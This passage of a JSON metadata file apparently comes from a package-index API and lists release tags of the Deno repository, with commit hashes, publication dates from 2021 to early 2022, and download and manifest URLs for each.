fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_u